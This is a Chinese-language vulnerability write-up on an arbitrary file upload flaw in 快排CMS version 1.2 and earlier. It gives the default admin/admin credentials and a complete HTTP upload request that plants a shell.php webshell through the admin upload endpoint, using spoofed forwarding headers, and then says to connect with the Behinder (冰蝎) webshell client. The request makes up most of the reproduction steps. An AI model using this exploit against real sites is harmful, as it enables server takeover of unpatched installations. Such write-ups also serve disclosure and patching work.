快排CMS_任意文件上传漏洞-棉花糖会员站

# 快排CMS 任意文件上传漏洞

## 漏洞描述

快排CMS 后台管理模块存在任意文件上传漏洞，攻击者通过漏洞可以控制服务器

## 漏洞影响

> [!NOTE]
>
> 快排 CMS <= 1.2 ## 环境搭建 https://gitee.com/qingzhanwang/kpcms ## 漏洞复现登录页面如下, 默认账号密码为 **admin/admin** ``` http://xxx.xxx.xxx.xxx/admin.php/index/login.html ``` ![](/static/qingy/快排CMS_任意文件上传漏洞/img/1.png) 源码中没有对上传文件的后缀检测 ``` thinkphp/library/think/File.php ``` ![](/static/qingy/快排CMS_任意文件上传漏洞/img/2.png) 任意找一处文件上传点 ![](/static/qingy/快排CMS_任意文件上传漏洞/img/3.png) 上传抓包获取文件地址 ![](/static/qingy/快排CMS_任意文件上传漏洞/img/4.png) ``` POST /admin.php/index/upload.html?dir=image HTTP/1.1 Host: 192.168.1.108:88 Content-Length: 935 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.108:88 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYIt9WaQZiDMrwAVm User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.108:88/admin.php/config/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: admin_id=IphHb2Z%2FRG9gIXGA7HpPzQ%3D%3D; menu_show=0; menu_id=menu_22; url=%2Fadmin.php%2Fconfig%2Findex.html x-forwarded-for: 127.0.0.1 x-originating-ip: 127.0.0.1 x-remote-ip: 127.0.0.1 x-remote-addr: 127.0.0.1 Connection: close ------WebKitFormBoundaryYIt9WaQZiDMrwAVm Content-Disposition: form-data; name="localUrl" C:\fakepath\shell.php ------WebKitFormBoundaryYIt9WaQZiDMrwAVm Content-Disposition: form-data; name="imgFile"; filename="shell.php" Content-Type: application/octet-stream

——WebKitFormBoundaryYIt9WaQZiDMrwAVm–

“`

连接冰蝎木马即可

![](/static/qingy/快排CMS_任意文件上传漏洞/img/5.png)

文章版权归作者所有，未经允许请勿转载。

THE END